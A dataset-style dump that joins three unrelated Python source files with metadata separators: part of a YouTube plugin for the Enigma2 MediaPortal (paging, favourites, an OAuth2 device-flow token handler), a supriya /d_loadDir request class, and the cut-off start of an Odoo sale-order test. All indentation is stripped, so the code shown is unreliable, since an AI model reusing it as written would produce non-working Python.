self.ml.setList(map(self.YT_ListEntry, [(_('Please wait...'),'','','','','','')]))
hl = param_ajax_hl[config.mediaportal.yt_param_meta_idx.value]
if hl != picker_lang:
self.setLang("https://www.youtube.com", hl)
return
if self.favoGenre:
self.getFavos()
else:
url = self.stvLink
if self.apiUrlv3:
url = url.replace('%KEY%', APIKEYV3)
url += "&maxResults=%d" % (self.max_res,)
if self.c4_browse_ajax:
url += '&pageToken=' + self.c4_browse_ajax
elif self.ajaxUrl:
if not 'paging=' in url:
url += '&paging=%d' % max(1, self.page)
url = '%s%s' % (self.baseUrl, url)
elif self.c4_browse_ajax:
url = '%s%s' % (self.baseUrl, self.c4_browse_ajax)
else:
if url[-1] == '?' or url[-1] == '&':
url = '%sflow=list' % url
elif url[-1] != '?' or url[-1] != '&':
url = '%s&flow=list' % url
if not '&gl=' in url:
url += self.param_regionid[config.mediaportal.yt_param_regionid_idx.value]
self.lastUrl = url
if self.apiUrlv3 and '%ACT-' in url:
self.actType = re.search('(%ACT-.*?%)', url).group(1)
url = url.replace(self.actType, '', 1)
self.actType = unicode(re.search('%ACT-(.*?)%', self.actType).group(1))
if '%ACCESSTOKEN%' in url:
token = yt_oauth2.getAccessToken()
if not token:
yt_oauth2.refreshToken(self.session).addCallback(self.getData, url).addErrback(self.dataError)
else:
self.getData(token, url)
else:
self.getData(None, url)
def setLang(self, url, hl):
picker_url = "https://www.youtube.com/picker_ajax?action_language=1&base_url=" + urllib.quote(url)
twAgentGetPage(picker_url, cookieJar=self.keckse, agent=agent, headers=self.headers).addCallback(self.gotPickerData, hl).addErrback(self.dataError)
def gotPickerData(self, data, hl):
global picker_lang
try:
data = json.loads(data)["html"].encode('utf-8')
m = re.search('<form(.*?)</form>', data, re.S)
action_url = self.baseUrl + re.search('action="(.*?)"', m.group(1)).group(1).replace('&', '&')
base_url = re.search('<input.*?name="base_url" value="(.*?)"', m.group(1)).group(1).replace('&', '&')
session_token = re.search('<input.*?name="session_token" value="(.*?)"', m.group(1)).group(1)
except:
print 'html:',data
else:
picker_lang = hl
postdata = urllib.urlencode({
'base_url': base_url,
'session_token': session_token,
'hl': hl})
headers = self.headers.copy()
headers['Content-Type'] = 'application/x-www-form-urlencoded'
twAgentGetPage(action_url, method='POST', cookieJar=self.keckse, agent=agent, headers=headers, postdata=postdata).addCallback(lambda _: self.loadPageData()).addErrback(self.pickerError)
def pickerError(self, err):
printl('pickerError:%s' % err,self,'E')
def getData(self, token, url):
if token:
url = url.replace('%ACCESSTOKEN%', token, 1)
if '%playlistId=' in url:
return self.getRelatedUserPL(url, token)
twAgentGetPage(url, cookieJar=self.keckse, agent=agent, headers=self.headers).addCallback(self.genreData).addErrback(self.dataError)
def getRelatedUserPL(self, url, token):
pl = re.search('%playlistId=(.*?)%', url).group(1)
yt_url = re.sub('%playlistId=.*?%', '', url, 1)
twAgentGetPage(yt_url, cookieJar=self.keckse, agent=agent, headers=self.headers).addCallback(self.parseRelatedPL, token, pl).addErrback(self.dataError)
def parseRelatedPL(self, data, token, pl):
try:
data = json.loads(data)
except:
pass
else:
for item in data.get('items', {}):
playlist = item['contentDetails']['relatedPlaylists']
if pl in playlist:
yt_url = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&playlistId=%s&access_token=%s&order=date' % (str(playlist[pl]), token)
return twAgentGetPage(yt_url, cookieJar=self.keckse, agent=agent, headers=self.headers).addCallback(self.genreData).addErrback(self.dataError)
reactor.callLater(0, genreData, '')
def parsePagingUrl(self, data):
regex = re.compile('data-uix-load-more-href="(.*?)"')
m = regex.search(data)
if m:
if not self.page:
self.page = 1
self.c4_browse_ajax = m.group(1).replace('&', '&')
else:
if not 'load-more-text' in data:
self.c4_browse_ajax = ''
self.pages = self.page
def parsePagingUrlv3(self, jdata):
if not self.page:
self.page = 1
self.c4_browse_ajax = str(jdata.get('nextPageToken', ''))
def genreData(self, data):
if self.apiUrlv3:
data = json.loads(data)
self.parsePagingUrlv3(data)
elif not self.apiUrl:
try:
if "load_more_widget_html" in data:
data = json.loads(data)
self.parsePagingUrl(data["load_more_widget_html"].replace("\\n","").replace("\\","").encode('utf-8'))
data = data["content_html"].replace("\\n","").replace("\\","").encode('utf-8')
else:
data = json.loads(data)["content_html"].replace("\\n","").replace("\\","").encode('utf-8')
self.parsePagingUrl(data)
except:
self.parsePagingUrl(data)
elif not self.pages:
m = re.search('totalResults>(.*?)</', data)
if m:
a = int(m.group(1))
self.pages = a // self.max_res
if a % self.max_res:
self.pages += 1
if self.pages > self.max_pages:
self.pages = self.max_pages
self.page = 1
self.filmliste = []
if self.apiUrlv3:
def getThumbnail(thumbnails):
if 'standard' in thumbnails:
return str(thumbnails['standard']['url'])
elif 'high' in thumbnails:
return str(thumbnails['high']['url'])
elif 'medium' in thumbnails:
return str(thumbnails['medium']['url'])
else:
return str(thumbnails['default']['url'])
listType = re.search('ItemList|subscriptionList|activityList|playlistList|CategoryList|channelList', data.get('kind', '')) != None
for item in data.get('items', []):
if not listType:
kind = item['id'].get('kind')
else:
kind = item.get('kind')
if kind != None:
if item.has_key('snippet'):
localized = item['snippet'].has_key('localized')
if not localized:
title = str(item['snippet'].get('title', ''))
desc = str(item['snippet'].get('description', ''))
else:
loca = item['snippet']['localized']
title = str(loca.get('title', ''))
desc = str(loca.get('description', ''))
if kind.endswith('#video'):
try:
url = str(item['id']['videoId'])
img = getThumbnail(item['snippet']['thumbnails'])
except:
pass
else:
self.filmliste.append(('', title, url, img, desc, '', ''))
elif kind.endswith('#playlistItem'):
try:
url = str(item['snippet']['resourceId']['videoId'])
img = getThumbnail(item['snippet']['thumbnails'])
except:
pass
else:
self.filmliste.append(('', title, url, img, desc, '', ''))
elif kind.endswith('channel'):
if listType:
id = str(item['id'])
url = '/channel/%s/featured' % id
img = getThumbnail(item['snippet']['thumbnails'])
self.filmliste.append(('', title, url, img, desc, '', ''))
else:
url = str(item['id']['channelId'])
img = getThumbnail(item['snippet']['thumbnails'])
self.filmliste.append(('', title, url, img, desc, 'CV3', ''))
elif kind.endswith('#playlist'):
if not listType:
url = str(item['id']['playlistId'])
else:
url = str(item['id'])
img = getThumbnail(item['snippet']['thumbnails'])
self.filmliste.append(('', title, url, img, desc, 'PV3', ''))
elif kind.endswith('#subscription'):
url = str(item['snippet']['resourceId']['channelId'])
img = getThumbnail(item['snippet']['thumbnails'])
self.filmliste.append(('', title, url, img, desc, 'CV3', ''))
elif kind.endswith('#guideCategory'):
url = str(item['id'])
img = ''
self.filmliste.append(('', title, url, img, desc, 'GV3', ''))
elif kind.endswith('#activity'):
desc = str(item['snippet'].get('description', ''))
if item['snippet'].get('type') == self.actType:
try:
if self.actType == u'upload':
url = str(item['contentDetails'][self.actType]['videoId'])
else:
url = str(item['contentDetails'][self.actType]['resourceId']['videoId'])
img = getThumbnail(item['snippet']['thumbnails'])
except:
pass
else:
self.filmliste.append(('', title, url, img, desc, '', ''))
elif 'contentDetails' in item:
details = item['contentDetails']
if kind.endswith('#channel'):
if 'relatedPlaylists' in details:
for k, v in details['relatedPlaylists'].iteritems:
url = str(v)
img = ''
desc = ''
self.filmliste.append(('', str(k).title(), url, img, desc, 'PV3', ''))
else:
data = data.replace('\n', '')
entrys = None
list_item_cont = branded_item = shelf_item = yt_pl_thumb = list_item = pl_video_yt_uix_tile = yt_lockup_video = False
if self.genreName.endswith("Channels") and "branded-page-related-channels-item" in data:
branded_item = True
entrys = data.split("branded-page-related-channels-item")
elif "channels-browse-content-list-item" in data:
list_item = True
entrys = data.split("channels-browse-content-list-item")
elif "browse-list-item-container" in data:
list_item_cont = True
entrys = data.split("browse-list-item-container")
elif re.search('[" ]+shelf-item[" ]+', data):
shelf_item = True
entrys = data.split("shelf-item ")
elif "yt-pl-thumb " in data:
yt_pl_thumb = True
entrys = data.split("yt-pl-thumb ")
elif "pl-video yt-uix-tile " in data:
pl_video_yt_uix_tile = True
entrys = data.split("pl-video yt-uix-tile ")
elif "yt-lockup-video " in data:
yt_lockup_video = True
entrys = data.split("yt-lockup-video ")
if entrys and not self.propertyImageUrl:
m = re.search('"appbar-nav-avatar" src="(.*?)"', entrys[0])
property_img = m and m.group(1)
if property_img:
if property_img.startswith('//'):
property_img = 'http:' + property_img
self.propertyImageUrl = property_img
if list_item_cont or branded_item or shelf_item or list_item or yt_pl_thumb or pl_video_yt_uix_tile or yt_lockup_video:
for entry in entrys[1:]:
if 'data-item-type="V"' in entry:
vidcnt = '[Paid Content] '
elif 'data-title="[Private' in entry:
vidcnt = '[private Video] '
else:
vidcnt = ''
gid = 'S'
m = re.search('href="(.*?)" class=', entry)
vid = m and m.group(1).replace('&','&')
if not vid:
continue
if branded_item and not '/SB' in vid:
continue
img = title = ''
if '<span class="" ' in entry:
m = re.search('<span class="" .*?>(.*?)</span>', entry)
if m:
title += decodeHtml(m.group(1))
elif 'dir="ltr" title="' in entry:
m = re.search('dir="ltr" title="(.+?)"', entry, re.DOTALL)
if m:
title += decodeHtml(m.group(1).strip())
m = re.search('data-thumb="(.*?)"', entry)
img = m and m.group(1)
else:
m = re.search('dir="ltr".*?">(.+?)</a>', entry, re.DOTALL)
if m:
title += decodeHtml(m.group(1).strip())
m = re.search('data-thumb="(.*?)"', entry)
img = m and m.group(1)
if not img:
img = self.propertyImageUrl
if img and img.startswith('//'):
img = 'http:' + img
img = img.replace('&','&')
desc = ''
if not vidcnt and 'list=' in vid and not '/videos?' in self.stvLink:
m = re.search('formatted-video-count-label">\s+<b>(.*?)</b>', entry)
if m:
vidcnt = '[%s Videos] ' % m.group(1)
elif vid.startswith('/watch?'):
if not vidcnt:
vid = re.search('v=(.+)', vid).group(1)
gid = ''
m = re.search('video-time">(.+?)<', entry)
if m:
dura = m.group(1)
if len(dura)==4:
vtim = '0:0%s' % dura
elif len(dura)==5:
vtim = '0:%s' % dura
else:
vtim = dura
vidcnt = '[%s] ' % vtim
m = re.search('data-name=.*?>(.*?)</.*?<li>(.*?)</li>\s+</ul>', entry)
if m:
desc += 'von ' + decodeHtml(m.group(1)) + ' · ' + m.group(2).replace('</li>', ' ').replace('<li>', '· ') + '\n'
m = re.search('dir="ltr">(.+?)</div>', entry)
if (shelf_item or list_item_cont) and not desc and not m:
m = re.search('shelf-description.*?">(.+?)</div>', entry)
if m:
desc += decodeHtml(m.group(1).strip())
splits = desc.split('<br />')
desc = ''
for split in splits:
if not '<a href="' in split:
desc += split + '\n'
if list_item and not vidcnt:
m = re.search('yt-lockup-meta-info"><li>(.*?)</ul>', entry)
if m:
vidcnt = re.sub('<.*?>', '', m.group(1))
vidcnt = '[%s] ' % vidcnt
self.filmliste.append((vidcnt, str(title), vid, img, desc, gid, ''))
reactor.callLater(0, self.checkListe)
def checkListe(self):
if len(self.filmliste) == 0:
self.filmliste.append(('',_('No contents / results found!'),'','','','',''))
self.keyLocked = True
if self.page <= 1:
self.page = 0
self.pages = self.page
self.c4_browse_ajax = ''
else:
if not self.page:
self.page = self.pages = 1
menu_len = len(self.filmliste)
self.keyLocked = False
self.ml.setList(map(self.YT_ListEntry, self.filmliste))
self.th_ThumbsQuery(self.filmliste, 1, 2, 3, None, None, self.page, self.pages, mode=self.modeShowThumb)
self.showInfos()
def dataError(self, error):
self.ml.setList(map(self.YT_ListEntry, [('',_('No contents / results found!'),'','','','','')]))
self['handlung'].setText("")
def showInfos(self):
if (self.c4_browse_ajax and not self.pages) and self.page:
self['page'].setText("%d" % self.page)
else:
self['page'].setText("%d / %d" % (self.page,max(self.page, self.pages)))
stvTitle = self['liste'].getCurrent()[0][1]
stvImage = self['liste'].getCurrent()[0][3]
desc = self['liste'].getCurrent()[0][4]
self['name'].setText(stvTitle)
self['handlung'].setText(desc)
if self.lastCover != stvImage:
self.lastCover = stvImage
self.coverHelper.getCover(stvImage)
def youtubeErr(self, error):
self['handlung'].setText(_("Unfortunately, this video can not be played!\n")+str(error))
def setVideoPrio(self):
self.videoPrio = int(config.mediaportal.youtubeprio.value)
def delFavo(self):
i = self['liste'].getSelectedIndex()
c = j = 0
l = len(self.filmliste)
try:
f1 = open(self.favo_path, 'w')
while j < l:
if j != i:
c += 1
dura = self.filmliste[j][0]
dhTitle = self.filmliste[j][1]
dhVideoId = self.filmliste[j][2]
dhImg = self.filmliste[j][3]
desc = urllib.quote(self.filmliste[j][4])
gid = self.filmliste[j][5]
wdat = '<i>%d</i><n>%s</n><v>%s</v><im>%s</im><d>%s</d><g>%s</g><desc>%s</desc>\n' % (c, dhTitle, dhVideoId, dhImg, dura, gid, desc)
f1.write(wdat)
j += 1
f1.close()
self.getFavos()
except IOError, e:
print "Fehler:\n",e
print "eCode: ",e
self['handlung'].setText(_("Error!\n")+str(e))
f1.close()
def addFavo(self):
dhTitle = self['liste'].getCurrent()[0][1]
dura = self['liste'].getCurrent()[0][0]
dhImg = self['liste'].getCurrent()[0][3]
gid = self['liste'].getCurrent()[0][5]
desc = urllib.quote(self['liste'].getCurrent()[0][4])
dhVideoId = self['liste'].getCurrent()[0][2]
if not self.favoGenre and gid in ('S','P','C'):
dura = ''
dhTitle = self.genreName + ':' + dhTitle
try:
if not fileExists(self.favo_path):
f1 = open(self.favo_path, 'w')
f_new = True
else:
f_new = False
f1 = open(self.favo_path, 'a+')
max_i = 0
if not f_new:
data = f1.read()
for m in re.finditer('<i>(\d*?)</i>.*?<v>(.*?)</v>', data):
v_found = False
i, v = m.groups()
ix = int(i)
if ix > max_i:
max_i = ix
if v == dhVideoId:
v_found = True
if v_found:
f1.close()
self.session.open(MessageBoxExt, _("Favorite already exists"), MessageBoxExt.TYPE_INFO, timeout=5)
return
wdat = '<i>%d</i><n>%s</n><v>%s</v><im>%s</im><d>%s</d><g>%s</g><desc>%s</desc>\n' % (max_i + 1, dhTitle, dhVideoId, dhImg, dura, gid, desc)
f1.write(wdat)
f1.close()
self.session.open(MessageBoxExt, _("Favorite added"), MessageBoxExt.TYPE_INFO, timeout=5)
except IOError, e:
print "Fehler:\n",e
print "eCode: ",e
self['handlung'].setText(_("Error!\n")+str(e))
f1.close()
def getFavos(self):
self.filmliste = []
try:
if not fileExists(self.favo_path):
f_new = True
else:
f_new = False
f1 = open(self.favo_path, 'r')
if not f_new:
data = f1.read()
f1.close()
for m in re.finditer('<n>(.*?)</n><v>(.*?)</v><im>(.*?)</im><d>(.*?)</d><g>(.*?)</g><desc>(.*?)</desc>', data):
n, v, img, dura, gid, desc = m.groups()
if dura and not dura.startswith('['):
dura = '[%s] ' % dura.rstrip()
self.filmliste.append((dura, n, v, img, urllib.unquote(desc), gid, ''))
if len(self.filmliste) == 0:
self.pages = self.page = 0
self.filmliste.append((_('No videos found!'),'','','','','',''))
self.keyLocked = True
if not f_new and len(data) > 0:
os.remove(self.favo_path)
else:
self.pages = self.page = 1
self.keyLocked = False
self.ml.setList(map(self.YT_ListEntry, self.filmliste))
self.showInfos()
except IOError, e:
print "Fehler:\n",e
print "eCode: ",e
self['handlung'].setText(_("Error!\n")+str(e))
f1.close()
def changeSort(self):
list = (
(_("Date"), ("order=date", 0)),
(_("Rating"), ("order=rating", 1)),
(_("Relevance"), ("order=relevance", 2)),
(_("Title"), ("order=title", 3)),
(_("Video count"), ("order=videoCount", 4)),
(_("View count"), ("order=viewCount", 5))
)
self.session.openWithCallback(self.cb_handleSortParam, ChoiceBoxExt, title=_("Sort by"), list = list, selection=config.mediaportal.yt_param_time_idx.value)
def cb_handleSortParam(self, answer):
p = answer and answer[1]
if p != None:
config.mediaportal.yt_param_time_idx.value = p[1]
self.stvLink = re.sub('order=([a-zA-Z]+)', p[0], self.stvLink)
self.keckse.clear()
self.c4_browse_ajax = ''
self.url_c4_browse_ajax_list = ['']
self.page = self.pages = 0
self.loadPageData()
def keyRed(self):
if not self.key_sort:
self.keyCancel()
elif not self.keyLocked:
self.changeSort()
def keyUpRepeated(self):
if self.keyLocked:
return
self['liste'].up()
def keyDownRepeated(self):
if self.keyLocked:
return
self['liste'].down()
def key_repeatedUp(self):
if self.keyLocked:
return
self.showInfos()
def keyLeftRepeated(self):
if self.keyLocked:
return
self['liste'].pageUp()
def keyRightRepeated(self):
if self.keyLocked:
return
self['liste'].pageDown()
def keyUp(self):
if self.keyLocked:
return
i = self['liste'].getSelectedIndex()
if not i:
self.keyPageDownFast()
self['liste'].up()
self.showInfos()
def keyDown(self):
if self.keyLocked:
return
i = self['liste'].getSelectedIndex()
l = len(self.filmliste) - 1
if l == i:
self.keyPageUpFast()
self['liste'].down()
self.showInfos()
def keyTxtPageUp(self):
if self.keyLocked:
return
self['handlung'].pageUp()
def keyTxtPageDown(self):
if self.keyLocked:
return
self['handlung'].pageDown()
def keyPageUpFast(self,step=1):
if self.keyLocked:
return
oldpage = self.page
if not self.c4_browse_ajax and not self.apiUrlv3:
if not self.page or not self.pages:
return
if (self.page + step) <= self.pages:
self.page += step
self.start_idx += self.max_res * step
else:
self.page = 1
self.start_idx = 1
elif self.c4_browse_ajax:
self.url_c4_browse_ajax_list.append(self.c4_browse_ajax)
self.page += 1
else:
return
if oldpage != self.page:
self.loadPageData()
def keyPageDownFast(self,step=1):
if self.keyLocked:
return
oldpage = self.page
if not self.c4_browse_ajax and not self.apiUrlv3:
if not self.page or not self.pages:
return
if (self.page - step) >= 1:
self.page -= step
self.start_idx -= self.max_res * step
else:
self.page = self.pages
self.start_idx = self.max_res * (self.pages - 1) + 1
else:
if self.page <= 1:
return
self.url_c4_browse_ajax_list.pop()
self.c4_browse_ajax = self.url_c4_browse_ajax_list[-1]
self.page -= 1
if oldpage != self.page:
self.loadPageData()
def key_1(self):
self.keyPageDownFast(2)
def keyGreen(self):
if self.keyLocked:
return
if self.favoGenre:
self.delFavo()
else:
self.addFavo()
def key_4(self):
self.keyPageDownFast(5)
def key_7(self):
self.keyPageDownFast(10)
def key_3(self):
self.keyPageUpFast(2)
def key_6(self):
self.keyPageUpFast(5)
def key_9(self):
self.keyPageUpFast(10)
def keyOK(self):
if self.keyLocked:
return
url = self['liste'].getCurrent()[0][2]
gid = self['liste'].getCurrent()[0][5]
if gid == 'P' or gid == 'C':
dhTitle = 'Videos: ' + self['liste'].getCurrent()[0][1]
genreurl = self['liste'].getCurrent()[0][2]
if genreurl.startswith('http'):
genreurl = genreurl.replace('v=2', '')
else:
genreurl = 'gdata.youtube.com/feeds/api/playlists/'+self['liste'].getCurrent()[0][2]+'?'
dhTitle = 'Videos: ' + self['liste'].getCurrent()[0][1]
if self.favoGenre:
self.session.openWithCallback(self.getFavos, YT_ListScreen, genreurl, dhTitle)
else:
self.session.open(YT_ListScreen, genreurl, dhTitle)
elif gid == 'CV3':
dhTitle = 'Ergebnisse: ' + self['liste'].getCurrent()[0][1]
genreurl = self['liste'].getCurrent()[0][2]
genreurl = 'https://www.googleapis.com/youtube/v3/search?part=snippet%2Cid&type=video&order=date&channelId='+self['liste'].getCurrent()[0][2]+'&key=%KEY%'
if self.favoGenre:
self.session.openWithCallback(self.getFavos, YT_ListScreen, genreurl, dhTitle)
else:
self.session.open(YT_ListScreen, genreurl, dhTitle)
elif gid == 'GV3':
dhTitle = 'Ergebnisse: ' + self['liste'].getCurrent()[0][1]
genreurl = self['liste'].getCurrent()[0][2]
hl = param_hl[config.mediaportal.yt_param_meta_idx.value]
genreurl = 'https://www.googleapis.com/youtube/v3/channels?part=snippet&categoryId='+self['liste'].getCurrent()[0][2]+hl+'&key=%KEY%'
if self.favoGenre:
self.session.openWithCallback(self.getFavos, YT_ListScreen, genreurl, dhTitle)
else:
self.session.open(YT_ListScreen, genreurl, dhTitle)
elif gid == 'PV3':
dhTitle = 'Videos: ' + self['liste'].getCurrent()[0][1]
genreurl = self['liste'].getCurrent()[0][2]
genreurl = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&order=date&playlistId='+self['liste'].getCurrent()[0][2]+'&key=%KEY%'
if self.favoGenre:
self.session.openWithCallback(self.getFavos, YT_ListScreen, genreurl, dhTitle)
else:
self.session.open(YT_ListScreen, genreurl, dhTitle)
elif not self.apiUrl or gid == 'S':
global picker_lang
if url.startswith('/playlist?'):
m = re.search('list=(.+)', url)
if m:
url = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&playlistId=%s&order=date&key=' % m.group(1)
url += '%KEY%'
dhTitle = 'Playlist: ' + self['liste'].getCurrent()[0][1]
self.session.open(YT_ListScreen, url, dhTitle)
elif url.startswith('/user/') or url.startswith('/channel/'):
url = url.replace('&', '&')
if '?' in url:
url += '&'
else:
url += '?'
url = self.baseUrl + url
dhTitle = self.genreName + ':' + self['liste'].getCurrent()[0][1]
picker_lang = ''
self.session.open(YT_ListScreen, url, dhTitle)
elif url.startswith('/watch?v='):
if not 'list=' in url or '/videos?' in self.stvLink:
url = re.search('v=(.+)', url).group(1)
listitem = self.filmliste[self['liste'].getSelectedIndex()]
liste = [(listitem[0], listitem[1], url, listitem[3], listitem[4], listitem[5], listitem[6])]
self.session.openWithCallback(
self.setVideoPrio,
YoutubePlayer,
liste,
0,
playAll = False,
listTitle = self.genreName,
plType='local',
title_inr=1,
showCover=self.showCover
)
else:
url = re.search('list=(.+)', url).group(1)
url = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&playlistId=%s&order=date&key=' % url
url += '%KEY%'
dhTitle = 'Playlist: ' + self['liste'].getCurrent()[0][1]
self.session.open(YT_ListScreen, url, dhTitle)
else:
self.session.openWithCallback(
self.setVideoPrio,
YoutubePlayer,
self.filmliste,
self['liste'].getSelectedIndex(),
playAll = self.playAll,
listTitle = self.genreName,
plType='local',
title_inr=1,
showCover=self.showCover
)
elif not self['liste'].getCurrent()[0][6]:
self.session.openWithCallback(
self.setVideoPrio,
YoutubePlayer,
self.filmliste,
self['liste'].getSelectedIndex(),
playAll = self.playAll,
listTitle = self.genreName,
plType='local',
title_inr=1,
showCover=self.showCover
)
def youtubeExit(self):
self.keckse.clear()
del self.filmliste[:]
class YT_Oauth2:
OAUTH2_URL = 'https://accounts.google.com/o/oauth2'
CLIENT_ID = mp_globals.yt_i
CLIENT_SECRET = mp_globals.yt_s
SCOPE = '&scope=https://www.googleapis.com/auth/youtube'
GRANT_TYPE = '&grant_type=http://oauth.net/grant_type/device/1.0'
TOKEN_PATH = '/etc/enigma2/mp_yt-access-tokens.json'
accessToken = None
def __init__(self):
import os.path
self._interval = None
self._code = None
self._expiresIn = None
self._refreshTimer = None
self.autoRefresh = False
self.abortPoll = False
self.waitingBox = None
self.session = None
if not config.mediaportal.yt_refresh_token.value:
self._recoverToken()
def _recoverToken(self):
if os.path.isfile(self.TOKEN_PATH):
with open(self.TOKEN_PATH) as data_file:
data = json.load(data_file)
config.mediaportal.yt_refresh_token.value = data['refresh_token'].encode('utf-8')
config.mediaportal.yt_refresh_token.save()
return True
def requestDevCode(self, session):
self.session = session
postData = self.CLIENT_ID + self.SCOPE
twAgentGetPage(self.OAUTH2_URL+'/device/code', method='POST', postdata=postData, headers={'Content-Type': 'application/x-www-form-urlencoded'}).addCallback(self._cb_requestDevCode, False).addErrback(self._cb_requestDevCode)
def _cb_requestDevCode(self, data, error=True):
if error:
self.session.open(MessageBoxExt, _("Error: Unable to request the Device code"), MessageBoxExt.TYPE_ERROR)
printl(_("Error: Unable to request the Device code"),self,'E')
else:
googleData = json.loads(data)
self._interval = googleData['interval']
self._code = '&code=%s' % googleData['device_code'].encode('utf-8')
self._expiresIn = googleData['expires_in']
self.session.openWithCallback(self.cb_request, MessageBoxExt, _("You've to visit:\n{url}\nand enter the code: {code}\nCancel action?").format(url=googleData["verification_url"].encode('utf-8'), code=googleData["user_code"].encode('utf-8')), type = MessageBoxExt.TYPE_YESNO, default = False)
def cb_request(self, answer):
if answer is False:
self.waitingBox = self.session.openWithCallback(self.cb_cancelPoll, MessageBoxExt, _("Waiting for response from the server.\nCancel action?"), type = MessageBoxExt.TYPE_YESNO, default = True, timeout = self._expiresIn - 30)
self.abortPoll = False
reactor.callLater(self._interval, self._pollOauth2Server)
def cb_cancelPoll(self, answer):
if answer is True:
self.abortPoll = True
def _pollOauth2Server(self):
self._tokenExpired()
postData = self.CLIENT_ID + self.CLIENT_SECRET + self._code + self.GRANT_TYPE
twAgentGetPage(self.OAUTH2_URL+'/token', method='POST', postdata=postData, headers={'Content-Type': 'application/x-www-form-urlencoded'}).addCallback(self._cb_poll, False).addErrback(self._cb_poll)
def _cb_poll(self, data, error=True):
if error:
self.waitingBox.cancel()
self.session.open(MessageBoxExt, _('Error: Unable to get tokens!'), MessageBoxExt.TYPE_ERROR)
printl(_('Error: Unable to get tokens!'),self,'E')
else:
try:
tokenData = json.loads(data)
except:
self.waitingBox.cancel()
self.session.open(MessageBoxExt, _('Error: Unable to get tokens!'), MessageBoxExt.TYPE_ERROR)
printl('json data error:%s' % str(data),self,'E')
else:
if not tokenData.get('error',''):
self.accessToken = tokenData['access_token'].encode('utf-8')
config.mediaportal.yt_refresh_token.value = tokenData['refresh_token'].encode('utf-8')
config.mediaportal.yt_refresh_token.value = tokenData['refresh_token'].encode('utf-8')
config.mediaportal.yt_refresh_token.save()
self._expiresIn = tokenData['expires_in']
self._startRefreshTimer()
f = open(self.TOKEN_PATH, 'w')
f.write(json.dumps(tokenData))
f.close()
self.waitingBox.cancel()
self.session.open(MessageBoxExt, _('Access granted :)\nFor safety you should create backup\'s of enigma2 settings and \'/etc/enigma2/mp_yt-access-tokens.json\'.\nThe tokens are valid until they are revoked in Your Google Account.'), MessageBoxExt.TYPE_INFO)
elif not self.abortPoll:
print tokenData.get('error','').encode('utf-8')
reactor.callLater(self._interval, self._pollOauth2Server)
def refreshToken(self, session, skip=False):
self.session = session
if not skip:
self._tokenExpired()
if config.mediaportal.yt_refresh_token.value:
postData = self.CLIENT_ID + self.CLIENT_SECRET + '&refresh_token=%s&grant_type=refresh_token' % config.mediaportal.yt_refresh_token.value
d = twAgentGetPage(self.OAUTH2_URL+'/token', method='POST', postdata=postData, headers={'Content-Type': 'application/x-www-form-urlencoded'}).addCallback(self._cb_refresh, False).addErrback(self._cb_refresh)
return d
def _cb_refresh(self, data, error=True):
if error:
printl(_('Error: Unable to refresh token!'),self,'E')
return data
else:
try:
tokenData = json.loads(data)
self.accessToken = tokenData['access_token'].encode('utf-8')
self._expiresIn = tokenData['expires_in']
except:
printl('json data error!',self,'E')
return ""
else:
self._startRefreshTimer()
return self.accessToken
def revokeToken(self):
if config.mediaportal.yt_refresh_token.value:
twAgentGetPage(self.OAUTH2_URL+'/revoke?token=%s' % config.mediaportal.yt_refresh_token.value).addCallback(self._cb_revoke, False).addErrback(self._cb_revoke)
def _cb_revoke(self, data, error=True):
if error:
printl('Error: Unable to revoke!',self,'E')
def _startRefreshTimer(self):
if self._refreshTimer != None and self._refreshTimer.active():
self._refreshTimer.cancel()
self._refreshTimer = reactor.callLater(self._expiresIn - 10, self._tokenExpired)
def _tokenExpired(self):
if self._refreshTimer != None and self._refreshTimer.active():
self._refreshTimer.cancel()
self._expiresIn = 0
self.accessToken = None
def getAccessToken(self):
if self.accessToken == None:
return ""
else:
return self.accessToken
yt_oauth2 = YT_Oauth2() | gpl-2.0 | -8,659,979,360,545,974,000 | 35.764026 | 405 | 0.650682 | false |
Pulgama/supriya | supriya/commands/SynthDefLoadDirectoryRequest.py | 1 | 1591 | import pathlib
import supriya.osc
from supriya.commands.Request import Request
from supriya.commands.RequestBundle import RequestBundle
from supriya.enums import RequestId
class SynthDefLoadDirectoryRequest(Request):
"""
A /d_loadDir request.
"""
### CLASS VARIABLES ###
__slots__ = ("_callback", "_directory_path")
request_id = RequestId.SYNTHDEF_LOAD_DIR
### INITIALIZER ###
def __init__(self, callback=None, directory_path=None):
Request.__init__(self)
if callback is not None:
assert isinstance(callback, (Request, RequestBundle))
self._callback = callback
self._directory_path = pathlib.Path(directory_path).absolute()
### PUBLIC METHODS ###
def to_osc(self, *, with_placeholders=False, with_request_name=False):
if with_request_name:
request_id = self.request_name
else:
request_id = int(self.request_id)
contents = [request_id, str(self.directory_path)]
if self.callback:
contents.append(
self.callback.to_osc(
with_placeholders=with_placeholders,
with_request_name=with_request_name,
)
)
message = supriya.osc.OscMessage(*contents)
return message
### PUBLIC PROPERTIES ###
@property
def callback(self):
return self._callback
@property
def response_patterns(self):
return ["/done", "/d_loadDir"], None
@property
def directory_path(self):
return self._directory_path
| mit | 4,937,795,839,363,454,000 | 25.966102 | 74 | 0.607165 | false |
maxive/erp | addons/sale_order_dates/tests/test_expected_date.py | 2 | 4352 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import timedelta
from odoo import fields
from odoo.tests import common
class TestSaleExpectedDate(common.TransactionCase):
def test_sale_order_expected_date(self):
""" Test expected date and effective date of Sales Orders """
Product = self.env['product.product']
product_A = Product.create({
'name': 'Product A',
'type': 'product',
'sale_delay': 5,
'uom_id': 1,
})
product_B = Product.create({
'name': 'Product B',
'type': 'product',
'sale_delay': 10,
'uom_id': 1,
})
product_C = Product.create({
'name': 'Product C',
'type': 'product',
'sale_delay': 15,
'uom_id': 1,
})
self.env['stock.quant']._update_available_quantity(product_A, self.env.ref('stock.stock_location_stock'), 10)
self.env['stock.quant']._update_available_quantity(product_B, self.env.ref('stock.stock_location_stock'), 10)
self.env['stock.quant']._update_available_quantity(product_C, self.env.ref('stock.stock_location_stock'), 10)
sale_order = self.env['sale.order'].create({
'partner_id': self.ref('base.res_partner_3'),
'picking_policy': 'direct',
'order_line': [
(0, 0, {'name': product_A.name, 'product_id': product_A.id, 'customer_lead': product_A.sale_delay, 'product_uom_qty': 5}),
(0, 0, {'name': product_B.name, 'product_id': product_B.id, 'customer_lead': product_B.sale_delay, 'product_uom_qty': 5}),
